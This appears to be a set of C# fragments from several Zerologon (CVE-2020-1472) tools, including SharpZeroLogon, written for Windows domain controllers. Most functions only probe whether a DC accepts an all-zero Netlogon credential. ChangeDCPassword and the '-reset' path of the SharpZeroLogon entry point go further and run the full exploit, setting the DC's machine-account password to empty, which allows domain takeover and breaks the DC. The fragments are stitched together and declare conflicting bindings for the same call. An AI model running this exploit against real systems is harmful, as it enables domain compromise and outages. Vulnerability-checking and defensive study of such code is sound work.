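/// <summary>
/// Zerologon (CVE-2020-1472) probe for one domain controller: repeatedly opens a
/// Netlogon session with an all-zero client challenge and an all-zero client
/// credential and reports, as a tab-separated "computer\tresult" record, whether
/// the DC ever accepts it. The probe is read-only: it never calls the
/// password-set RPC, so a "Vulnerable" result changes nothing on the target.
/// </summary>
/// <param name="computer">DC name; the short host name is the part before the first '.'.</param>
/// <returns>
/// "Vulnerable after N attempts" on the first accepted authentication;
/// "Error 1: &lt;hex&gt;" if the challenge RPC fails;
/// "Error 3: &lt;hex&gt;" on any authenticate status other than 0xC0000022
/// (STATUS_ACCESS_DENIED, the normal answer from a patched DC or an unlucky attempt);
/// "Error 2: &lt;hex&gt;" when every attempt was denied (the hex is the last status).
/// </returns>
protected override string GetCsvData(string computer)
{
    const uint StatusAccessDenied = 0xc0000022;
    // MS-NRPC secure-channel type 6 = ServerSecureChannel, i.e. the DC's own account.
    const int ServerSecureChannel = 6;
    // Attempt budget used by the public Zerologon PoCs; each attempt is an independent handshake.
    const int MaxAttempts = 2000;

    // Loop-invariant: derive the short host name once instead of per attempt.
    string dcname = computer.Split('.')[0];
    int r = 0;

    for (int attempt = 0; attempt < MaxAttempts; attempt++)
    {
        // new byte[8] is all zeros: this is the Zerologon primitive (zero challenge, zero credential).
        var clientCred = new NETLOGON_CREDENTIAL { data = new byte[8] };
        var serverCred = new NETLOGON_CREDENTIAL { data = new byte[8] };
        // Requested negotiate flags. Re-initialised on every attempt: the parameter is passed
        // by ref, so a failed call may have written the server's negotiated value back into it,
        // and the next attempt should request the same flags as the first.
        int negotiateFlags = 0x212fffff;

        r = I_NetServerReqChallenge(computer, dcname, ref clientCred, out serverCred);
        if (r != 0)
        {
            return computer + "\t" + "Error 1: " + r.ToString("x");
        }

        // The server challenge is deliberately ignored: the zero credential does not depend on it.
        r = I_NetServerAuthenticate2(computer, dcname + "$", ServerSecureChannel, dcname,
                                     ref clientCred, out serverCred, ref negotiateFlags);
        if (r == 0)
        {
            return computer + "\t" + "Vulnerable after " + attempt + " attempts";
        }
        if ((uint)r != StatusAccessDenied)
        {
            return computer + "\t" + "Error 3: " + r.ToString("x");
        }
    }

    // Every attempt was denied; r still holds the last STATUS_ACCESS_DENIED.
    return computer + "\t" + "Error 2: " + r.ToString("x");
}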
/// <summary>
/// P/Invoke binding for the Netlogon authenticate call (presumably netapi32's
/// I_NetServerAuthenticate2, which wraps NetrServerAuthenticate2 on the secure channel).
/// The [DllImport] attribute that binds it is outside this listing.
/// </summary>
/// <param name="PrimaryName">DC to talk to; callers pass the FQDN.</param>
/// <param name="AccountName">Account being authenticated; callers pass "&lt;host&gt;$".</param>
/// <param name="AccountType">Secure-channel type claimed for the account.</param>
/// <param name="ComputerName">Client computer name presented to the DC (the short host name).</param>
/// <param name="ClientCredential">Client credential; in the Zerologon probe this is all zeros.</param>
/// <param name="ServerCredential">Presumably receives the server-side credential; the probes never read it.</param>
/// <param name="NegotiateFlags">
/// In: flags requested by the client; out: what the server agreed to.
/// NOTE(review): the native parameter is a 32-bit ULONG, but this declaration uses a 64-bit
/// ulong. It works on the usual little-endian targets because only the low dword is read and
/// written in place; uint would be the exact match, but callers pass a ulong, so the signature
/// is kept as-is.
/// </param>
/// <returns>0 on success, otherwise an NTSTATUS (callers compare against 0).</returns>
public static extern int I_NetServerAuthenticate2(
    string PrimaryName,
    string AccountName,
    NETLOGON_SECURE_CHANNEL_TYPE AccountType,
    string ComputerName,
    ref NETLOGON_CREDENTIAL ClientCredential,
    ref NETLOGON_CREDENTIAL ServerCredential,
    ref ulong NegotiateFlags);
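/// <summary>
/// Zerologon step 2: NetrServerPasswordSet2 against <paramref name="targetcomputeraccount"/>
/// with all-zero authenticators and an all-zero NL_TRUST_PASSWORD, i.e. it sets the account's
/// password in AD to the empty password. Only meaningful right after
/// <see cref="Tryzerologonenticate"/> succeeded, because an all-zero authenticator is only
/// valid once the negotiated session key is all zeros.
///
/// WARNING: destructive. This changes the DC account's password in the directory but does
/// nothing to the DC's own stored copy, so the DC stops functioning until the original
/// password is restored. Run only with authorisation and a tested restore path.
/// </summary>
/// <param name="targetcomputeraccount">Machine account to reset, e.g. "DC01$".</param>
/// <returns>The NTSTATUS returned by the RPC stub.</returns>
private static Natives.NTSTATUS ChangeDCPassword(string targetcomputeraccount)
{
    // Both authenticators carry a zero credential and zero timestamp.
    var plainAuth = new NETLOGON_AUTHENTICATOR
    {
        Credential = new NETLOGON_CREDENTIAL { data = new byte[8] },
        Timestamp = 0,
    };
    var cipherAuth = new NETLOGON_AUTHENTICATOR
    {
        Credential = new NETLOGON_CREDENTIAL { data = new byte[8] },
        Timestamp = 0,
    };
    // Default-initialised (all zero) -> zero-length new password.
    var trustPassword = new NL_TRUST_PASSWORD();

    IntPtr pcred = IntPtr.Zero, ccred = IntPtr.Zero, ptpass = IntPtr.Zero;
    IntPtr computernamePtr = IntPtr.Zero, targetcomputeraccountPtr = IntPtr.Zero;
    try
    {
        pcred = Marshal.AllocHGlobal(Marshal.SizeOf(plainAuth));
        Marshal.StructureToPtr(plainAuth, pcred, false);
        ccred = Marshal.AllocHGlobal(Marshal.SizeOf(cipherAuth));
        Marshal.StructureToPtr(cipherAuth, ccred, false);
        ptpass = Marshal.AllocHGlobal(Marshal.SizeOf(trustPassword));
        Marshal.StructureToPtr(trustPassword, ptpass, false);
        // The client computer name is arbitrary; it does not have to exist in the domain.
        computernamePtr = Marshal.StringToHGlobalUni("Neverland");
        targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount);

        // 142 is presumably the proc-format-string offset for this call (GetProcStringPtr not shown).
        return (Natives.NTSTATUS)NetServerPasswordSet2(
            GetStubPtr(), GetProcStringPtr(142), IntPtr.Zero,
            targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
            computernamePtr, pcred, ccred, ptpass);
    }
    finally
    {
        // The call is synchronous, so every unmanaged buffer can be released once it returns
        // (previously none of them were freed). FreeHGlobal(IntPtr.Zero) is a no-op.
        Marshal.FreeHGlobal(pcred);
        Marshal.FreeHGlobal(ccred);
        Marshal.FreeHGlobal(ptpass);
        Marshal.FreeHGlobal(computernamePtr);
        Marshal.FreeHGlobal(targetcomputeraccountPtr);
    }
}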
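/// <summary>
/// Zerologon step 1: one NetrServerReqChallenge + NetrServerAuthenticate3 round against
/// <paramref name="targetcomputeraccount"/> with an all-zero client challenge and an all-zero
/// client credential. Returns true when the DC accepts the credential, which is the point at
/// which <see cref="ChangeDCPassword"/> can follow. Whether a single round succeeds depends on
/// the challenge the server picks, so callers are expected to repeat this call.
/// </summary>
/// <param name="targetcomputeraccount">Machine account name, e.g. "DC01$".</param>
/// <returns>
/// true if NetrServerAuthenticate3 returned Success; false if the challenge failed, the
/// authenticate call returned any other status, or the stub threw.
/// </returns>
private static bool Tryzerologonenticate(string targetcomputeraccount)
{
    // All-zero challenge and credential: the Zerologon primitive.
    var clientCred = new NETLOGON_CREDENTIAL { data = new byte[8] };
    NETLOGON_CREDENTIAL serverCred;
    // Flag set used by the public Zerologon PoCs; presumably chosen so the DC does not insist on
    // a signed/sealed channel once the zero session key is in place.
    uint flags = 0x212fffff;
    uint rid = 0;

    IntPtr pcred = IntPtr.Zero, computernamePtr = IntPtr.Zero, targetcomputeraccountPtr = IntPtr.Zero;
    try
    {
        pcred = Marshal.AllocHGlobal(Marshal.SizeOf(clientCred));
        Marshal.StructureToPtr(clientCred, pcred, false);
        // Arbitrary client computer name; it does not have to exist.
        computernamePtr = Marshal.StringToHGlobalUni("Neverland");
        targetcomputeraccountPtr = Marshal.StringToHGlobalUni(targetcomputeraccount);

        // 0 / 62 are presumably proc-format-string offsets (GetProcStringPtr not shown).
        var status = (NTSTATUS)NetrServerReqChallenge(
            GetStubPtr(), GetProcStringPtr(0), IntPtr.Zero, computernamePtr, pcred, out serverCred);
        if (status != NTSTATUS.Success)
        {
            // Without a pending challenge on the DC the authenticate call cannot succeed; don't send it.
            Console.WriteLine("Error: NetrServerReqChallenge returned " + status);
            return false;
        }

        try
        {
            status = (NTSTATUS)NetrServerAuthenticate3(
                GetStubPtr(), GetProcStringPtr(62), IntPtr.Zero,
                targetcomputeraccountPtr, NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                computernamePtr, pcred, out serverCred, out flags, out rid);
            if (status == NTSTATUS.Success)
            {
                Console.WriteLine("\n[*]");
                return true;
            }
        }
        catch (Exception e)
        {
            // A thrown stub error (as opposed to a returned AccessDenied) is always worth reporting.
            Console.WriteLine("Error: " + e.Message);
        }
        return false;
    }
    finally
    {
        // Release the unmanaged buffers on every path (they were previously leaked per call).
        Marshal.FreeHGlobal(pcred);
        Marshal.FreeHGlobal(computernamePtr);
        Marshal.FreeHGlobal(targetcomputeraccountPtr);
    }
}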
/// <summary>
/// P/Invoke binding for the Netlogon authenticate call (presumably netapi32's
/// I_NetServerAuthenticate2). The [DllImport] attribute is outside this listing.
/// This overload takes the secure-channel type and the flags as plain ints, so the
/// 32-bit flags parameter matches the native ULONG exactly.
/// </summary>
/// <param name="domain">DC to talk to; callers pass the computer's name.</param>
/// <param name="account">Account being authenticated; callers pass "&lt;host&gt;$".</param>
/// <param name="SecureChannelType">Secure-channel type claimed for the account (6 = ServerSecureChannel).</param>
/// <param name="computername">Client computer name presented to the DC.</param>
/// <param name="ClientCredential">Client credential; all zeros in the Zerologon probe.</param>
/// <param name="ServerCredential">Presumably receives the server-side credential; the probe never reads it.</param>
/// <param name="NegotiateFlags">In: requested flags; out: what the server agreed to.</param>
/// <returns>0 on success, otherwise an NTSTATUS (0xC0000022 is STATUS_ACCESS_DENIED).</returns>
internal static extern int I_NetServerAuthenticate2(
    string domain,
    string account,
    int SecureChannelType,
    string computername,
    ref NETLOGON_CREDENTIAL ClientCredential,
    out NETLOGON_CREDENTIAL ServerCredential,
    ref int NegotiateFlags);
/// <summary>
/// P/Invoke binding for the Netlogon challenge exchange (presumably netapi32's
/// I_NetServerReqChallenge). The [DllImport] attribute is outside this listing.
/// </summary>
/// <param name="domain">DC to talk to; callers pass the computer's name.</param>
/// <param name="computer">Client computer name (the short host name).</param>
/// <param name="ClientChallenge">Challenge sent by the client; all zeros in the Zerologon probe.</param>
/// <param name="ServerChallenge">Receives the DC's challenge. The probe discards it: the zero
/// credential it sends next does not depend on the server challenge.</param>
/// <returns>0 on success, otherwise an NTSTATUS.</returns>
internal static extern int I_NetServerReqChallenge(
    string domain,
    string computer,
    ref NETLOGON_CREDENTIAL ClientChallenge,
    out NETLOGON_CREDENTIAL ServerChallenge);
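/// <summary>
/// Entry point: checks whether the DC named by args[0] accepts a Netlogon authentication
/// with an all-zero client challenge and credential (Zerologon, CVE-2020-1472).
/// Read-only: it never calls the password-set RPC, so the check changes nothing on the DC.
/// </summary>
/// <param name="args">args[0]: DC FQDN. A name without a '.' triggers a prompt until one is given.</param>
static void Main(string[] args)
{
    recap();

    if (args.Length < 1)
    {
        Console.WriteLine("[-] Usage: <dc fqdn>");
        return;
    }

    string remoteHost = args[0];
    while (!remoteHost.Contains("."))
    {
        Console.WriteLine("[-] Please provide FQDN :");
        string line = Console.ReadLine();
        if (line == null)
        {
            // stdin closed: nothing more to read, and Contains would throw on null.
            return;
        }
        remoteHost = line;
        Console.Clear();
    }
    // Derived from the validated name, not args[0], so a name typed at the prompt is honoured.
    string remoteHostName = remoteHost.Split('.')[0];

    NETLOGON_CREDENTIAL clientChallenge = new NETLOGON_CREDENTIAL();
    NETLOGON_CREDENTIAL serverChallenge = new NETLOGON_CREDENTIAL();
    // Same glyph order the original spinner produced: "-", "\", "|", "/".
    const string spinner = "-\\|/";
    ConsoleColor savedColour = Console.ForegroundColor;

    Console.WriteLine("[+] Begining auth attempts...");
    Console.Write("[+] Working... ");
    Console.CursorVisible = false;
    Console.WriteLine("\n\n");
    try
    {
        for (int i = 0; i < 2000; i++)
        {
            Console.Write(" " + spinner[i % 4]);
            Console.SetCursorPosition(Console.CursorLeft - 2, Console.CursorTop);

            // Requested flags, re-initialised per attempt: the parameter is passed by ref and a
            // failed call may have written the server's negotiated value back into it.
            ulong negotiateFlags = 0x212fffff;

            if (I_NetServerReqChallenge(remoteHost, remoteHostName, ref clientChallenge, ref serverChallenge) != 0)
            {
                Console.WriteLine("[-] Could not complete server challenge. Could be invalid name provided or network issues\n");
                return;
            }
            // The server challenge is ignored on purpose; a zero credential does not depend on it.
            if (I_NetServerAuthenticate2(remoteHost, remoteHostName + "$",
                                         NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                                         remoteHostName, ref clientChallenge, ref serverChallenge,
                                         ref negotiateFlags) == 0)
            {
                Console.ForegroundColor = ConsoleColor.Red;
                Console.WriteLine("[+] DC is vulnerable to Zerologon attack.\n");
                return;
            }
        }
        Console.ForegroundColor = ConsoleColor.Green;
        Console.WriteLine("[+] DC appear to not be vulnerable to Zerologon attack.\n");
    }
    finally
    {
        // Restore the console on every exit path; previously the early returns left the
        // cursor hidden.
        Console.ForegroundColor = savedColour;
        Console.CursorVisible = true;
    }
}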
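/// <summary>
/// SharpZeroLogon entry point. Probes the DC given as args[0] for Zerologon (CVE-2020-1472)
/// by repeating the Netlogon handshake with an all-zero client challenge and credential and,
/// only when "-reset" is given, follows a success with NetrServerPasswordSet2 to set the DC's
/// machine-account password to the empty password.
///
/// WARNING: "-reset" is destructive. It changes the DC account's password in the directory
/// but not the DC's own stored copy, so the DC stops functioning until the original password
/// is restored. Without "-reset" the tool is a read-only check.
/// </summary>
/// <param name="args">
/// [0] target DC FQDN; optional "-reset" (perform the password reset) and "-patch"
/// (call PatchLogon() before probing).
/// </param>
static void Main(string[] args)
{
    if (args.Length < 1)
    {
        Console.WriteLine(" Usage: SharpZeroLogon.exe <target dc fqdn> <optional: -reset -patch>");
        return;
    }

    string fqdn = args[0];
    string hostname = fqdn.Split('.')[0];
    // Exact (ordinal) matches only, as before.
    bool reset = Array.IndexOf(args, "-reset") >= 0;
    bool patch = Array.IndexOf(args, "-patch") >= 0;

    if (patch)
    {
        if (!PatchLogon())
        {
            Console.WriteLine("Patching failed :(");
            return;
        }
        Console.WriteLine("Patch successful. Will use ncacn_ip_tcp");
    }

    var clientChallenge = new NETLOGON_CREDENTIAL();
    var serverChallenge = new NETLOGON_CREDENTIAL();

    Console.WriteLine("Performing authentication attempts...");
    for (int attempt = 0; attempt < 2000; attempt++)
    {
        if (I_NetServerReqChallenge(fqdn, hostname, ref clientChallenge, ref serverChallenge) != 0)
        {
            Console.WriteLine("Unable to complete server challenge. Possible invalid name or network issues?");
            return;
        }
        Console.Write("=");

        // Requested flags, re-initialised per attempt: the parameter is passed by ref and a
        // failed call may have written the server's negotiated value back into it.
        ulong negotiateFlags = 0x212fffff;
        if (I_NetServerAuthenticate2(fqdn, hostname + "$",
                                     NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                                     hostname, ref clientChallenge, ref serverChallenge,
                                     ref negotiateFlags) != 0)
        {
            continue;
        }

        Console.WriteLine("\nSuccess! DC can be fully compromised by a Zerologon attack.");
        if (!reset)
        {
            return;
        }

        // Default-initialised structs: a zero authenticator (valid once the session key is zero)
        // and a zero-length new password.
        var authenticator = new NETLOGON_AUTHENTICATOR();
        var clearNewPassword = new NL_TRUST_PASSWORD();
        if (I_NetServerPasswordSet2(fqdn, hostname + "$",
                                    NETLOGON_SECURE_CHANNEL_TYPE.ServerSecureChannel,
                                    hostname, ref authenticator, out _, ref clearNewPassword) == 0)
        {
            // The printed value is the NT hash of the empty password that was just set.
            Console.WriteLine("Done! Machine account password set to NTLM: 31d6cfe0d16ae931b73c59d7e0c089c0");
        }
        else
        {
            Console.WriteLine("Failed to reset machine account password");
        }
        return;
    }

    Console.WriteLine("\nAttack failed. Target is probably patched.");
}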
/// <summary>
/// P/Invoke binding for the Netlogon challenge exchange (presumably netapi32's
/// I_NetServerReqChallenge). The [DllImport] attribute is outside this listing.
/// </summary>
/// <param name="PrimaryName">DC to talk to; callers pass the FQDN.</param>
/// <param name="ComputerName">Client computer name (the short host name).</param>
/// <param name="ClientChallenge">Challenge sent by the client; default-initialised by callers.</param>
/// <param name="ServerChallenge">Receives the DC's challenge. Declared ref rather than out here;
/// either marshals as a pointer. Callers never read it, since the zero credential they send
/// next does not depend on the server challenge.</param>
/// <returns>0 on success, otherwise an NTSTATUS.</returns>
public static extern int I_NetServerReqChallenge(
    string PrimaryName,
    string ComputerName,
    ref NETLOGON_CREDENTIAL ClientChallenge,
    ref NETLOGON_CREDENTIAL ServerChallenge);